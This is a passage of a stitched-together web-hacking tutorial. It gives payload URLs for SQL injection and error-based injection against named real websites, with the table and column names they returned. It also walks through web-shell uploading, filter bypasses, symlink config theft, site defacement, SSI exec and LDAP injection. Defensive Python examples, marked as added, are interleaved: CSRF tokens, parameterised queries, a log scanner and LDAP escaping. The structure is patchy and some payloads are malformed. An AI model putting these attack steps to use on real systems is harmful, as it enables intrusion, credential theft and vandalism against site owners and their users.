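The fix the vulnerable chat script above is missing, as an added example in Python (not the tutorial's PHP): htmlspecialchars() leaves CR and LF untouched, so the forged "Admin" line survives; the chat has to collapse line breaks before storing a message. The transcript is constructed from the tutorial's example, with a real newline where the tutorial shows \n.

```python
"""
Added example, not part of the tutorial: why escaping HTML alone does not
stop the chat forgery above, and the line-break sanitising that does.
"""
import html
import re

# CR, LF, vertical tab, form feed, NEL and the Unicode line/paragraph separators.
LINE_BREAKS = re.compile(r"[\r\n\x0b\x0c\x85\u2028\u2029]+")

# What saiR actually submitted (constructed; the \n here is a real newline).
FORGED = ("Ok go ahead...\n1.4.2012 10:30 - Admin: You are right saiR login database "
          "is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php")


def sanitize_message(raw):
    """Collapse every run of line breaks into one space, then escape HTML."""
    one_line = LINE_BREAKS.sub(" ", raw).strip()
    return html.escape(one_line, quote=True)


def vulnerable_append(log, timestamp, user, raw_message):
    """The tutorial's script: escape HTML only, so an embedded newline remains."""
    return log + [f"{timestamp} - {user}: {html.escape(raw_message, quote=True)}"]


def append_to_chat(log, timestamp, user, raw_message):
    """Fixed version: one submitted message is always exactly one chat line."""
    return log + [f"{timestamp} - {user}: {sanitize_message(raw_message)}"]


def rendered_lines(log):
    """The lines users see once the stored log is joined and split on newlines."""
    return "\n".join(log).split("\n")


if __name__ == "__main__":
    for fn in (vulnerable_append, append_to_chat):
        print(fn.__name__)
        for line in rendered_lines(fn([], "1.4.2012 10:30", "saiR", FORGED)):
            print("  ", line)
```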
CSRF :
1) CSRF?
Short for Cross Site Request Forgery. CSRF is a mix of XSS and LFI. It is used to execute something without knowing the username.
2) Vulnerable places
It can be used when the site uses the GET method. If the CSRF is done successfully, the attacker can change some user's password. The most common vulnerable places are avatars.
3) Exploiting vulnerability
Let's say we have the profile link:
Code:
http://www.link.com/profile.php
where you can see the user data (username, avatar, email...).
The user edits his profile using e.g.
Code:
http://www.link.com/edit_profile.php
Now instead of an avatar link we add the profile-editing link together with the new value, using the GET method.
NOTE: The profile editing has to use the GET method, otherwise we won't be able to attack.
Add avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword
password is the name of the input (it can be different; it's best to check the source code).
Now when we look at the avatar we won't see a picture (as if there is none). When another user views your avatar, if the attack was successful, his password is changed to the one we put.
4) Example Of CSRF File Uploading Vulnerability.
1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
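What stops the avatar trick in section 3), as an added example that is not part of the tutorial: the edit_profile handler refuses state changes over GET and requires a per-session token that a request triggered from someone else's profile page cannot carry. The session store, users and request dicts are in-memory stand-ins constructed for this example; the secret key is a placeholder.

```python
"""
Added example, not part of the tutorial: CSRF defence for the password change
the avatar trick abuses. Requests, sessions and users are constructed.
"""
import hashlib
import hmac

SECRET_KEY = b"CONSTRUCTED-server-secret-placeholder"   # would come from config


def issue_csrf_token(session_id):
    """Token bound to the session: HMAC(key, session_id), embedded in the edit form."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf_token(session_id, presented):
    if not isinstance(presented, str):
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), presented)


def edit_profile(request, sessions, users):
    """
    request: {'method', 'session_id' (from the cookie), 'params' (dict)}.
    Only a POST carrying this session's token changes the password.
    """
    if request["method"] != "POST":
        return 405, "password changes must be sent with POST"
    sid = request.get("session_id")
    if sid not in sessions:
        return 401, "not logged in"
    if not check_csrf_token(sid, request["params"].get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    new_password = request["params"].get("password", "")
    if len(new_password) < 8:
        return 400, "password too short"
    users[sessions[sid]]["password"] = new_password
    return 200, "password changed"


def demo():
    """Replay the three requests the tutorial's scenario produces; return their statuses."""
    sessions = {"s1": "victim"}
    users = {"victim": {"password": "original-pw"}}
    # 1. The avatar trick: the victim's browser fetches the "image" URL with its own cookie.
    avatar = {"method": "GET", "session_id": "s1", "params": {"password": "newpassword"}}
    r1 = edit_profile(avatar, sessions, users)
    # 2. The same attack upgraded to an auto-submitting POST form: still no token.
    forged = {"method": "POST", "session_id": "s1", "params": {"password": "newpassword"}}
    r2 = edit_profile(forged, sessions, users)
    # 3. The real edit form, which carried the token issued to this session.
    legit = {"method": "POST", "session_id": "s1",
             "params": {"password": "newpassword", "csrf_token": issue_csrf_token("s1")}}
    r3 = edit_profile(legit, sessions, users)
    return r1[0], r2[0], r3[0], users["victim"]["password"]


if __name__ == "__main__":
    print(demo())
```

Note that a SameSite cookie attribute would not stop this particular variant on its own: the avatar is loaded from the site's own profile page, so the forged request is same-site; refusing GET for state changes and checking the token are what matter here.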
73. Server Side Includes | Server Side Inclusion :
1) Introduction Server Side Includes
Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update
DB, send mails and many other functions. SSI is working like when some run script on that site.
Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which
holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
Code:
AddType text/html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
Options Indexes FollowSymLinks Includes
2) Creating SSI
We start a directive with <!--#
A simple directive looks like this:
<!--#<command> <variable>=<variable content>-->
Code:
<command> is one of:
config
include
flow
set
printenv
echo
exec
fsize
flastmod
time & date
With --> we end the directive.
Script e.g.:
Code:
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->
3) Server Side Inclusion
A Server Side Inclusion attack is a very useful attacking method. For this it's recommended to
have basic knowledge of Bash and Batch programming.
A site is vulnerable to SSI when the extensions '.shtml', '.shtm' or '.stm' are included in the Apache
config file.
e.g. we can create a file with the next command:
Code:
<!--#exec cmd='ls -la'-->
Save this as a .shtml file and open it on the site.
I think you already know what is going to happen.
Hope this helped you!
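The directive syntax from sections 2) and 3) above, as an added example that is not part of this tutorial: a small Python parser for SSI directives and an audit function that flags the forms a reviewer of user-supplied .shtml content would refuse. The sample document, the function names and the rule set are all constructed for this example.

```python
import re

# <!--#command attr="value" attr2='value' -->   (what the tutorial calls a "script")
DIRECTIVE_RE = re.compile(r"<!--#\s*(?P<cmd>[a-zA-Z]+)(?P<attrs>[^>]*?)-->", re.DOTALL)
ATTR_RE = re.compile(r"""(?P<name>[a-zA-Z_]+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)')""")

# Constructed sample: the tutorial's two benign directives plus its exec example.
SAMPLE_SHTML = """<html><body>
<!--#include file="yourfilename.txt" -->
<!--#echo var='This will write this stupid text.'-->
<p>hello</p>
<!--#exec cmd='ls -la'-->
</body></html>"""


def parse_ssi(text):
    """Return a list of {'cmd', 'attrs', 'raw'} dicts, one per SSI directive found."""
    found = []
    for m in DIRECTIVE_RE.finditer(text):
        attrs = {}
        for a in ATTR_RE.finditer(m.group("attrs")):
            value = a.group("dq") if a.group("dq") is not None else a.group("sq")
            attrs[a.group("name").lower()] = value
        found.append({"cmd": m.group("cmd").lower(), "attrs": attrs, "raw": m.group(0)})
    return found


def audit_ssi(text):
    """Flag directives that should never appear in content a user can write.

    'exec' runs a program (cmd=) or CGI script (cgi=) on the server.
    'include' with an absolute or parent-relative path reaches outside the document tree.
    Returns a list of (reason, raw_directive) pairs.
    """
    findings = []
    for d in parse_ssi(text):
        if d["cmd"] == "exec":
            findings.append(("exec directive", d["raw"]))
        elif d["cmd"] == "include":
            path = d["attrs"].get("file") or d["attrs"].get("virtual") or ""
            if path.startswith("/") or ".." in path.split("/"):
                findings.append(("include outside document", d["raw"]))
    return findings
```

On the server side the same distinction is available in Apache itself: the `Options Includes` line in the .htaccess above enables every directive including exec, while `Options IncludesNOEXEC` keeps include/echo working and disables exec.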
Symlink Attack :
1] Upload shell 404.php
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] Go to [sec. info] in your shell, then [readable : etc/passwd <view>]
4] Copy all usernames & passwds from [ etc/passwd ]
5] Paste them in the [ config fucker ] tab of [ http://site.com/contact.php ].
6] Now open both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] On the configweb page you have some text that contains user & password [ these files are the
reverse or linked websites' details ]
8] Now log in to them using database.php [ change password in database ]
9] Then log in to the main site and deface its index.php page.
Malware Attachment On Website :
1] Go to the Public Html tab on your 404.php shell &
2] Open .htaccess in your shell
3] and paste your malware code.
Sql injection String & Union based :
1. Sql injection String based
[1] Description
In String based Sql injection :
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site shows a normal page even though it is
vulnerable to SQLi)
[2] Example
Solution to this issue in order to hack a site with String Based SQL injection:
The answer to this problem is to use the following format while trying to hack a site with
SQLi
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
id=X' order by--+
Alright, now that you've got the point, let's try String Based on some of the other types of SQL
injection, shall we?
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since it's an example for our process
2. Obtaining the Databases
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of
my tutorials to progress further in this step
3. Obtaining the Tables from the current Database
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where
table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where
table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "username" and "password" as our column names
5. Obtaining Data from Column names
http://www.site.com/index.php?id=-234' UNION SELECT
1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
6. Example :
1. http://www.onthegro.co.za/content.php?id=latest_news'
2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+
3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+
4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+
5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+
6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+
7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+
8. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
9. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(table_name,0x0a),4 from information_schema.tables where
table_schema=database()--+
10. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(column_name,0x0a),4 from information_schema.columns where
table_name=0x61646d696e--+
11. http://www.onthegro.co.za/content.php?id=-latest_news' order by
1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+
2. Sql injection Union based :
[1] Example
http://www.naukriguru.com
1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100
2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10
3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20
4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50
5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
from information_schema.tables where table_schema = database()--
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
from information_schema.columns where table_name = 0x6e675f61646d696e--
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin--
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php
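Why the string-based and union-based walkthroughs above work, and what stops them, as an added example that is not part of this tutorial: a Python/sqlite3 model of a content page. The schema, table names and function names are constructed for the example; the two query builders differ only in whether the id is concatenated into the SQL text (what the vulnerable sites do) or bound as a parameter. The same payload shape the tutorial uses is fed to both.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema mirroring the tutorial: a content table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE content (id TEXT, title TEXT, body TEXT, author TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO content VALUES ('latest_news', 'Latest news', 'Hello', 'editor');
        INSERT INTO admin VALUES ('admin', 'hash-placeholder');
    """)
    return conn


def get_content_vulnerable(conn, page_id):
    """String concatenation: a quote in page_id closes the literal and the rest is parsed as SQL."""
    sql = "SELECT id, title, body, author FROM content WHERE id='" + page_id + "'"
    return conn.execute(sql).fetchall()


def get_content_safe(conn, page_id):
    """Placeholder binding: page_id travels as data and is never parsed as SQL."""
    sql = "SELECT id, title, body, author FROM content WHERE id=?"
    return conn.execute(sql, (page_id,)).fetchall()


def errors_leak(conn, page_id):
    """True when the concatenated query raised a database error.

    This is what the tutorial's 'order by 1000' probe looks for: an ORDER BY position
    past the column count errors out, a valid one does not, so the error reveals the count.
    """
    try:
        get_content_vulnerable(conn, page_id)
        return False
    except sqlite3.OperationalError:
        return True


# Same shape as the tutorial's step 5 payload, with the trailing space that '--+' decodes to.
# The content query has four columns, so the UNION supplies four.
UNION_PAYLOAD = "-latest_news' UNION SELECT 1,2,username,password FROM admin-- "
```

The point to take from the pair is that no amount of quoting or filtering the `'` character is needed in the safe version: the driver sends the value out of band, so the probe returns no rows and no error. Error messages should still not reach the client, since even the safe query's own failures are information.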
80. Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :
Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
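The same probes seen from the server's access log, as an added example that is not part of this tutorial: a Python scanner that decodes the request target and tags the techniques the walkthrough above relies on (extractvalue/updatexml error extraction, MySQL `/*!` versioned comments, `order by` column probing, `union select`, and reads of information_schema). The log lines are constructed in the combined-log style; the query strings copy the probes shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined-log style); the query strings copy the probes above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /recipe.php?ID=3 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:10:00:02 +0000] "GET /recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 500 312
198.51.100.7 - - [10/Oct/2023:10:00:03 +0000] "GET /index.php?id=234%27%20order%20by%2011--+ HTTP/1.1" 500 220
198.51.100.7 - - [10/Oct/2023:10:00:04 +0000] "GET /index.php?id=-234%27%20UNION%20SELECT%201,2,group_concat(schema_name,0x0a),4%20from%20information_schema.schemata--+ HTTP/1.1" 200 4100
192.0.2.9 - - [10/Oct/2023:10:00:05 +0000] "GET /recipe.php?ID=12 HTTP/1.1" 200 5011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature names a technique used in the walkthrough above.
SIGNATURES = [
    ("error-based-xml-func", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("mysql-versioned-comment", re.compile(r"/\*!")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\.", re.I)),
]


def scan_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %xx and '+' first: the tutorial's payloads arrive URL-encoded.
    decoded = unquote_plus(m.group("target"))
    tags = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not tags:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "status": status,
        "tags": tags,
        # A 5xx on a probe means the database error text reached the client; a UNION
        # that returned 200 means the injected SELECT was accepted. Both are high.
        "severity": "high" if status >= 500 or "union-select" in tags else "medium",
        "target": decoded,
    }


def scan_log(text):
    """Run scan_line over every line of an access log and keep the hits."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]
```

Decoding before matching matters: `%20`, `+` and `%27` hide the keywords from a naive substring check, and the `/*!...*/` wrapping in the examples above exists precisely to slip past filters that only look for bare `select` or `where`.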
LDAP injections :
---[ 0x01: Introduction ]
LDAP (Lightweight Directory Access Protocol) is a lightweight protocol to access the X.500
directory service. This protocol works over TCP/IP.
The LDAP access protocol is used to query and modify stored objects.
---[ 0x02: LDAP filters ]
It is quite important to understand how LDAP filters work.
RFC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515).
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" / "~=" / ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
Logical operators:
- AND "&"
- OR "|"
- NOT "!"
Relational operators:
<=, >=, =, ~=
The wildcard "*" is used to replace characters.
Filter example:
(&(objectClass=user)(uid=*)): returns a list of all objects of type user, no matter which
value the attribute "uid" takes.
---[ 0x03: LDAP injection in Web Applications ]
The LDAP injection technique is very similar to SQL injection.
The attack technique is used to exploit websites that build LDAP statements directly from
data supplied by the user.
Vulnerable code with comments (by Sacha Faust):
+++++++++++++++++++++++++++++++++++++
line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>
+++++++++++++++++++++++++++++++++++++
In line 10 note that the userName variable is initialized with the value of the parameter user
and then quickly validated to see if the value is empty.
If the value is not empty, the variable userName is used to initialize the variable filter on
line 18.
This new variable is used directly to build an LDAP search, used in the call to SearchFilter
on line 27.
The attacker has full control over what will be queried on the LDAP server.
The result of the query is returned when the code reaches lines 32 to 40, where all results
and their attributes are displayed to the user.
Example 1:
http://website/ldap.asp?user=*
In this example the character "*" is sent in the "user" parameter, which ends up in the
variable filter.
This LDAP statement will show any object that has a uid attribute.
All users and their information are shown.
Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
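How line 18 should have been written, as an added example that is not part of this text or of Sacha Faust's code: a Python version of the filter builder beside a hardened one that escapes the assertion value as RFC 4515 section 3 requires (`\`, `*`, `(`, `)` and NUL become `\5c`, `\2a`, `\28`, `\29`, `\00`). The function names and the small structure check are constructed for the example; the two inputs are the tutorial's Example 1 and Example 2.

```python
# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    """Escape one assertion value so it cannot alter the filter's structure."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_uid_filter_vulnerable(user_name):
    """What line 18 of the ASP page does: raw concatenation of the user parameter."""
    return "(uid=" + user_name + ")"


def build_uid_filter(user_name):
    """Hardened equivalent: the user name is data, never filter syntax."""
    if not user_name:
        raise ValueError("user name required")
    return "(uid=" + escape_filter_value(user_name) + ")"


def top_level_components(filter_text):
    """Count top-level '(...)' groups. A single well-formed filter has exactly one;
    the injected Example 2 value produces two, which is how the extra clause gets in."""
    depth = 0
    count = 0
    for ch in filter_text:
        if ch == "(":
            if depth == 0:
                count += 1
            depth += 1
        elif ch == ")":
            depth -= 1
    return count
```

With escaping in place Example 1 searches for a user literally named `*` and Example 2 for a user literally named `ka0x)(|(homedirectory=*)`, so neither matches anything; the `uid` attribute is still compared, just against the text the client actually sent.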
Part 2
Web server Hacking
Using the above vulnerabilities, various types of hacks can be used to hack a web server.
Guide content:
Shell Uploading Guide
Shell uploading through php-my-admin
Shell Jumping
Symlink Bypass 2013 for Linux Servers
Hack Web-DAV & Deface
Root server without local root exploit
LINUX SERVER ROOTING Tutorial
Cpanel Cracking
Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
Backdoor a WEB SERVERS WITH WEBACOO
Web Server Hacking through Command Injection
How To Hack Windows Servers Using Dubrute 2.2
Symlink Tutorial for beginners
MASS DEFACE TUTORIAL
How to hack a websites using Symlink Bypassing
ATTACKING WEBSERVERS VIA .HTACCESS
How to Back-connect with netcat
Hacking Cold Fusion Servers - Part I
Hacking Cold Fusion Servers - Part II
So let's get started !
1. Shell Uploading Guide
Many newbies face problems while uploading a shell on a site after getting admin access / logging
in to that site. So, I am writing this in order to help them. Basically a shell gives us remote access
to that server. Such shells are available in different languages like php, asp/aspx, cgi etc. So, we
have to choose a shell that will work on the server according to the server script. If the server
supports php then we have to choose one of the php shells, otherwise asp & cgi. Now, let's
come to the main point: AFTER LOGGING IN TO THE SITE, IF WE FIND ANY
UPLOAD OPTION IN THE SITE, THEN WE CAN EASILY UPLOAD A SHELL. But
sometimes we have to do some changes to upload a shell.
Way 1
AS THE SHELL IS IN PHP FORMAT, SOME SITES DO NOT ALLOW UPLOADING SUCH
SCRIPTS DIRECTLY WITH THE PHP EXTENSION. If so, just rename the shell. Add
.gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php; then
we will rename it as shell.php.jpg or anything else.
Way 2
Upload a simple uploader shell first that isn't detected by antivirus and firewalls. THEN
UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD AN
UPLOADER SHELL FROM HERE.
WAY 3
SOME SERVER FIREWALLS DETECT THE SHELL SCRIPT BY CHECKING THE
headers & don't allow us to upload a shell. So we can bypass it by using the "GIF89A SHELL
SCRIPT BYPASS" method. Open your shell in notepad and add "GIF89a;" without quotes before
the shell code starts, like below:
GIF89a;
Depending on what kind of file validation they are using, this may fool the server into thinking
it's an image, since when it reads the file it finds the gif header and assumes it's safe since it's
an image.
WAY 4
This method is more advanced. This only works for client side filters rather than server side.
Download Firebug for Firefox, then edit the html of the upload form:
Code:
<form enctype="multipart/form-data" action="uploader.php" method="POST">
Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br />
<input type="submit" value="Upload File" />
</form>
Change the accept filter to *.* or just remove it completely; it will then let you upload any type
of file.
WAY 5
Download the "LIVE HTTP HEADERS" addon first for your Firefox browser.
